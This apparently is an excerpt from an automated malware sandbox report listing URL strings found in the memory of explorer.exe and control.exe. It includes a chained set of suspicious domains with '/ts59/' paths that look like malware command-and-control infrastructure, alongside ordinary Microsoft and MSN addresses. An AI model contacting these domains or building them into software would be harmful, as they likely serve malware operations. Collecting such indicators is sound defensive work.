Source: explorer.exe, 00000003.00000002.3821675015.000000000C43F000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.2272081328.000000000C42C000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.3073937500.000000000C42C000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: http://www.cn-brand.com
Source: explorer.exe, 00000003.00000002.3821675015.000000000C43F000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.2272081328.000000000C42C000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.3073937500.000000000C42C000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: http://www.cn-brand.com/ts59/
Source: explorer.exe, 00000003.00000002.3821675015.000000000C43F000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.2272081328.000000000C42C000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.3073937500.000000000C42C000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: http://www.cn-brand.com/ts59/www.asmauardotreschicshoes.com
Source: explorer.exe, 00000003.00000002.3821675015.000000000C43F000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.2272081328.000000000C42C000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.3073937500.000000000C42C000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: http://www.cn-brand.comReferer:
Source: explorer.exe, 00000003.00000002.3821675015.000000000C43F000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.2272081328.000000000C42C000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.3073937500.000000000C42C000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: http://www.femininequantumflowcoach.com
Source: explorer.exe, 00000003.00000002.3821675015.000000000C43F000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.2272081328.000000000C42C000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.3073937500.000000000C42C000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: http://www.femininequantumflowcoach.com/ts59/
Source: explorer.exe, 00000003.00000002.3821675015.000000000C43F000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.2272081328.000000000C42C000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.3073937500.000000000C42C000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: http://www.femininequantumflowcoach.com/ts59/www.wizardatm.com
Source: explorer.exe, 00000003.00000002.3821675015.000000000C43F000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.2272081328.000000000C42C000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.3073937500.000000000C42C000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: http://www.femininequantumflowcoach.comReferer:
Source: explorer.exe, 00000003.00000000.1375368578.00000000071B2000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: http://www.foreca.com
Source: explorer.exe, 00000003.00000002.3821675015.000000000C43F000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.2272081328.000000000C42C000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.3073937500.000000000C42C000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: http://www.gb-electric-wheelchairs-8j.bond
Source: explorer.exe, 00000003.00000002.3821675015.000000000C43F000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.2272081328.000000000C42C000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.3073937500.000000000C42C000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: http://www.gb-electric-wheelchairs-8j.bond/ts59/
Source: explorer.exe, 00000003.00000002.3821675015.000000000C43F000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.2272081328.000000000C42C000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.3073937500.000000000C42C000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: http://www.gb-electric-wheelchairs-8j.bond/ts59/www.lostaino.com
Source: explorer.exe, 00000003.00000002.3821675015.000000000C43F000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.2272081328.000000000C42C000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.3073937500.000000000C42C000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: http://www.gb-electric-wheelchairs-8j.bondReferer:
Source: explorer.exe, 00000003.00000002.3821675015.000000000C43F000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.2272081328.000000000C42C000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.3073937500.000000000C42C000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: http://www.kgstrengthandperformance.com
Source: explorer.exe, 00000003.00000002.3821675015.000000000C43F000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.2272081328.000000000C42C000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.3073937500.000000000C42C000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: http://www.kgstrengthandperformance.com/ts59/
Source: explorer.exe, 00000003.00000002.3821675015.000000000C43F000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.2272081328.000000000C42C000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.3073937500.000000000C42C000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: http://www.kgstrengthandperformance.com/ts59/www.redseadivingadventure.com
Source: explorer.exe, 00000003.00000002.3821675015.000000000C43F000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.2272081328.000000000C42C000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.3073937500.000000000C42C000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: http://www.kgstrengthandperformance.comReferer:
Source: explorer.exe, 00000003.00000002.3821675015.000000000C43F000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.2272081328.000000000C42C000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.3073937500.000000000C42C000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: http://www.lostaino.com
Source: explorer.exe, 00000003.00000002.3821675015.000000000C43F000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.2272081328.000000000C42C000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.3073937500.000000000C42C000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: http://www.lostaino.com/ts59/
Source: explorer.exe, 00000003.00000002.3821675015.000000000C43F000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.2272081328.000000000C42C000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.3073937500.000000000C42C000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: http://www.lostaino.com/ts59/www.modleavedepts.online
Source: explorer.exe, 00000003.00000002.3821675015.000000000C43F000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.2272081328.000000000C42C000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.3073937500.000000000C42C000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: http://www.lostaino.comReferer:
Source: explorer.exe, 00000003.00000002.3821675015.000000000C43F000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.2272081328.000000000C42C000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.3073937500.000000000C42C000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: http://www.modleavedepts.online
Source: explorer.exe, 00000003.00000002.3821675015.000000000C43F000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.2272081328.000000000C42C000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.3073937500.000000000C42C000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: http://www.modleavedepts.online/ts59/
Source: explorer.exe, 00000003.00000002.3821675015.000000000C43F000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.2272081328.000000000C42C000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.3073937500.000000000C42C000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: http://www.modleavedepts.online/ts59/www.kgstrengthandperformance.com
Source: explorer.exe, 00000003.00000002.3821675015.000000000C43F000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.2272081328.000000000C42C000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.3073937500.000000000C42C000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: http://www.modleavedepts.onlineReferer:
Source: explorer.exe, 00000003.00000002.3821675015.000000000C43F000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.2272081328.000000000C42C000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.3073937500.000000000C42C000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: http://www.qjjkxi260l.top
Source: explorer.exe, 00000003.00000003.3073937500.000000000C42C000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: http://www.qjjkxi260l.top/ts59/
Source: explorer.exe, 00000003.00000002.3821675015.000000000C43F000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.2272081328.000000000C42C000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.3073937500.000000000C42C000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: http://www.qjjkxi260l.topReferer:
Source: explorer.exe, 00000003.00000002.3821675015.000000000C43F000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.2272081328.000000000C42C000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.3073937500.000000000C42C000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: http://www.redseadivingadventure.com
Source: explorer.exe, 00000003.00000002.3821675015.000000000C43F000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.2272081328.000000000C42C000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.3073937500.000000000C42C000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: http://www.redseadivingadventure.com/ts59/
Source: explorer.exe, 00000003.00000002.3821675015.000000000C43F000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.2272081328.000000000C42C000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.3073937500.000000000C42C000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: http://www.redseadivingadventure.com/ts59/www.ssweatstudio.com
Source: explorer.exe, 00000003.00000002.3821675015.000000000C43F000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.2272081328.000000000C42C000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.3073937500.000000000C42C000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: http://www.redseadivingadventure.comReferer:
Source: explorer.exe, 00000003.00000002.3821675015.000000000C43F000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.2272081328.000000000C42C000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.3073937500.000000000C42C000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: http://www.robottts.com
Source: explorer.exe, 00000003.00000002.3821675015.000000000C43F000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.2272081328.000000000C42C000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.3073937500.000000000C42C000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: http://www.robottts.com/ts59/
Source: explorer.exe, 00000003.00000002.3821675015.000000000C43F000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.2272081328.000000000C42C000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.3073937500.000000000C42C000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: http://www.robottts.com/ts59/www.gb-electric-wheelchairs-8j.bond
Source: explorer.exe, 00000003.00000002.3821675015.000000000C43F000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.2272081328.000000000C42C000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.3073937500.000000000C42C000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: http://www.robottts.comReferer:
Source: explorer.exe, 00000003.00000002.3821675015.000000000C43F000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.2272081328.000000000C42C000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.3073937500.000000000C42C000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: http://www.scarytube.world
Source: explorer.exe, 00000003.00000002.3821675015.000000000C43F000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.2272081328.000000000C42C000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.3073937500.000000000C42C000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: http://www.scarytube.world/ts59/
Source: explorer.exe, 00000003.00000002.3821675015.000000000C43F000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.2272081328.000000000C42C000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.3073937500.000000000C42C000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: http://www.scarytube.world/ts59/www.robottts.com
Source: explorer.exe, 00000003.00000002.3821675015.000000000C43F000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.2272081328.000000000C42C000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.3073937500.000000000C42C000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: http://www.scarytube.worldReferer:
Source: explorer.exe, 00000003.00000002.3821675015.000000000C43F000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.2272081328.000000000C42C000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.3073937500.000000000C42C000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: http://www.ssweatstudio.com
Source: explorer.exe, 00000003.00000002.3821675015.000000000C43F000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.2272081328.000000000C42C000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.3073937500.000000000C42C000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: http://www.ssweatstudio.com/ts59/
Source: explorer.exe, 00000003.00000002.3821675015.000000000C43F000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.2272081328.000000000C42C000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.3073937500.000000000C42C000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: http://www.ssweatstudio.com/ts59/www.qjjkxi260l.top
Source: explorer.exe, 00000003.00000002.3821675015.000000000C43F000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.2272081328.000000000C42C000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.3073937500.000000000C42C000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: http://www.ssweatstudio.comReferer:
Source: explorer.exe, 00000003.00000002.3821675015.000000000C43F000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.2272081328.000000000C42C000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.3073937500.000000000C42C000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: http://www.texhio.online
Source: explorer.exe, 00000003.00000002.3821675015.000000000C43F000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.2272081328.000000000C42C000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.3073937500.000000000C42C000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: http://www.texhio.online/ts59/
Source: explorer.exe, 00000003.00000002.3821675015.000000000C43F000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.2272081328.000000000C42C000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.3073937500.000000000C42C000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: http://www.texhio.online/ts59/www.femininequantumflowcoach.com
Source: explorer.exe, 00000003.00000002.3821675015.000000000C43F000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.2272081328.000000000C42C000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.3073937500.000000000C42C000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: http://www.texhio.onlineReferer:
Source: explorer.exe, 00000003.00000002.3821675015.000000000C43F000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.2272081328.000000000C42C000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.3073937500.000000000C42C000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: http://www.wizardatm.com
Source: explorer.exe, 00000003.00000002.3821675015.000000000C43F000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.2272081328.000000000C42C000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.3073937500.000000000C42C000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: http://www.wizardatm.com/ts59/
Source: explorer.exe, 00000003.00000002.3821675015.000000000C43F000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.2272081328.000000000C42C000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.3073937500.000000000C42C000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: http://www.wizardatm.com/ts59/www.zangbreaker.com
Source: explorer.exe, 00000003.00000002.3821675015.000000000C43F000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.2272081328.000000000C42C000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.3073937500.000000000C42C000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: http://www.wizardatm.comReferer:
Source: explorer.exe, 00000003.00000002.3821675015.000000000C43F000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.2272081328.000000000C42C000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.3073937500.000000000C42C000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: http://www.zangbreaker.com
Source: explorer.exe, 00000003.00000002.3821675015.000000000C43F000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.2272081328.000000000C42C000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.3073937500.000000000C42C000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: http://www.zangbreaker.com/ts59/
Source: explorer.exe, 00000003.00000002.3821675015.000000000C43F000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.2272081328.000000000C42C000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.3073937500.000000000C42C000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: http://www.zangbreaker.com/ts59/www.babyscan.xyz
Source: explorer.exe, 00000003.00000002.3821675015.000000000C43F000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.2272081328.000000000C42C000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.3073937500.000000000C42C000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: http://www.zangbreaker.comReferer:
Source: explorer.exe, 00000003.00000000.1377287114.0000000008F4D000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.3074348658.0000000008F83000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.2272115538.0000000008F83000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000002.3816237958.0000000008F83000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: https://activity.windows.com/UserActivity.ReadWrite.CreatedByApp
Source: explorer.exe, 00000003.00000000.1377287114.000000000913F000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: https://android.notify.windows.com/iOS
Source: explorer.exe, 00000003.00000000.1377287114.0000000008F09000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: https://api.msn.com/
Source: explorer.exe, 00000003.00000003.3074348658.0000000008DB0000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: https://api.msn.com/v1/News/Feed/Windows?apikey=qrUeHGGYvVowZJuHA3XaH0uUvg1ZJ0GUZnXk3mxxPF&ocid=wind
Source: explorer.exe, 00000003.00000003.3074348658.0000000008F09000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.2272115538.0000000008F09000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000000.1377287114.0000000008F09000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: https://api.msn.com/v1/news/Feed/Windows?
Source: explorer.exe, 00000003.00000002.3812362279.00000000071FC000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000000.1375368578.00000000071FC000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: https://api.msn.com/v1/news/Feed/Windows?activityId=DD4083B70FE54739AB05D6BBA3484042&timeOut=5000&oc
Source: explorer.exe, 00000003.00000002.3812362279.00000000071FC000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000000.1375368578.00000000071FC000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: https://api.msn.com:443/v1/news/Feed/Windows?
Source: explorer.exe, 00000003.00000000.1375368578.0000000007276000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000002.3812362279.0000000007276000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: https://api.msn.com:443/v1/news/Feed/Windows?t
Source: explorer.exe, 00000003.00000003.2272115538.0000000008DFE000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000002.3816237958.0000000008DFE000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000000.1377287114.0000000008DFE000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.3074348658.0000000008DFE000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: https://arc.msn.com
Source: explorer.exe, 00000003.00000000.1375368578.00000000071FC000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: https://assets.msn.com/weathermapdata/1/static/finance/1stparty/FinanceTaskbarIcons/Finance_Earnings
Source: explorer.exe, 00000003.00000000.1375368578.00000000071FC000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: https://assets.msn.com/weathermapdata/1/static/weather/Icons/JyNGQgA=/Condition/AAehwh2.svg
Source: explorer.exe, 00000003.00000002.3812362279.00000000071FC000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000000.1375368578.00000000071FC000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: https://cdn.query.prod.cms.msn.com/cms/api/amp/binary/AA13f2DV
Source: explorer.exe, 00000003.00000002.3812362279.00000000071FC000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000000.1375368578.00000000071FC000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: https://cdn.query.prod.cms.msn.com/cms/api/amp/binary/AA13f2DV-dark
Source: explorer.exe, 00000003.00000002.3812362279.00000000071FC000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000000.1375368578.00000000071FC000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: https://cdn.query.prod.cms.msn.com/cms/api/amp/binary/AA13fcaT
Source: explorer.exe, 00000003.00000002.3812362279.00000000071FC000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000000.1375368578.00000000071FC000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: https://cdn.query.prod.cms.msn.com/cms/api/amp/binary/AA13fcaT-dark
Source: explorer.exe, 00000003.00000000.1379885909.000000000C091000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000002.3820341536.000000000C091000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: https://excel.office.com
Source: explorer.exe, 00000003.00000002.3812362279.00000000071FC000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000000.1375368578.00000000071FC000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: https://img-s-msn-com.akamaized.net/tenant/amp/entityid/AA11f7Wa.img
Source: explorer.exe, 00000003.00000002.3812362279.00000000071FC000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000000.1375368578.00000000071FC000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: https://img-s-msn-com.akamaized.net/tenant/amp/entityid/AA15Yat4.img
Source: explorer.exe, 00000003.00000002.3812362279.00000000071FC000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000000.1375368578.00000000071FC000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: https://img-s-msn-com.akamaized.net/tenant/amp/entityid/AA1bjET8.img
Source: explorer.exe, 00000003.00000002.3812362279.00000000071FC000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000000.1375368578.00000000071FC000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: https://img-s-msn-com.akamaized.net/tenant/amp/entityid/AA1c9Jin.img
Source: explorer.exe, 00000003.00000002.3812362279.00000000071FC000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000000.1375368578.00000000071FC000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: https://img-s-msn-com.akamaized.net/tenant/amp/entityid/BBNvr53.img
Source: explorer.exe, 00000003.00000000.1379885909.000000000C091000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000002.3820341536.000000000C091000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: https://outlook.com
Source: explorer.exe, 00000003.00000000.1379885909.000000000C091000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000002.3820341536.000000000C091000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: https://powerpoint.office.com
Source: explorer.exe, 00000003.00000002.3823187633.00000000113FF000.00000004.80000000.00040000.00000000.sdmp, control.exe, 00000004.00000002.3810060905.0000000004E7F000.00000004.10000000.00040000.00000000.sdmp	String found in binary or memory: https://status.squarespace.com
Source: explorer.exe, 00000003.00000002.3812362279.00000000071FC000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000000.1375368578.00000000071FC000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: https://windows.msn.com:443/shell?osLocale=en-GB&chosenMarketReason=ImplicitNew
Source: explorer.exe, 00000003.00000002.3812362279.00000000071FC000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000000.1375368578.00000000071FC000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: https://windows.msn.com:443/shellv2?osLocale=en-GB&chosenMarketReason=ImplicitNew
Source: explorer.exe, 00000003.00000003.2272115538.00000000090F2000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000002.3817490344.00000000090F2000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.3073987402.00000000090F2000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000000.1377287114.00000000090F2000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: https://wns.windows.com/
Source: explorer.exe, 00000003.00000000.1379885909.000000000C091000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000002.3820341536.000000000C091000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: https://word.office.com
Source: explorer.exe, 00000003.00000002.3823187633.00000000113FF000.00000004.80000000.00040000.00000000.sdmp, control.exe, 00000004.00000002.3810060905.0000000004E7F000.00000004.10000000.00040000.00000000.sdmp	String found in binary or memory: https://www.cloudflare.com/5xx-error-landing
Source: explorer.exe, 00000003.00000002.3812362279.00000000071FC000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000000.1375368578.00000000071FC000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: https://www.msn.com/en-us/lifestyle/lifestyle-buzz/what-to-do-if-a-worst-case-nuclear-scenario-actua
Source: explorer.exe, 00000003.00000002.3812362279.00000000071FC000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000000.1375368578.00000000071FC000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: https://www.msn.com/en-us/money/careersandeducation/student-loan-debt-forgiveness-arrives-for-some-b
Source: explorer.exe, 00000003.00000002.3812362279.00000000071FC000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000000.1375368578.00000000071FC000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: https://www.msn.com/en-us/money/markets/costco-is-seeing-a-gold-rush-what-s-behind-the-demand-for-it
Source: explorer.exe, 00000003.00000002.3812362279.00000000071FC000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000000.1375368578.00000000071FC000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: https://www.msn.com/en-us/money/realestate/why-this-florida-city-is-a-safe-haven-from-hurricanes/ar-
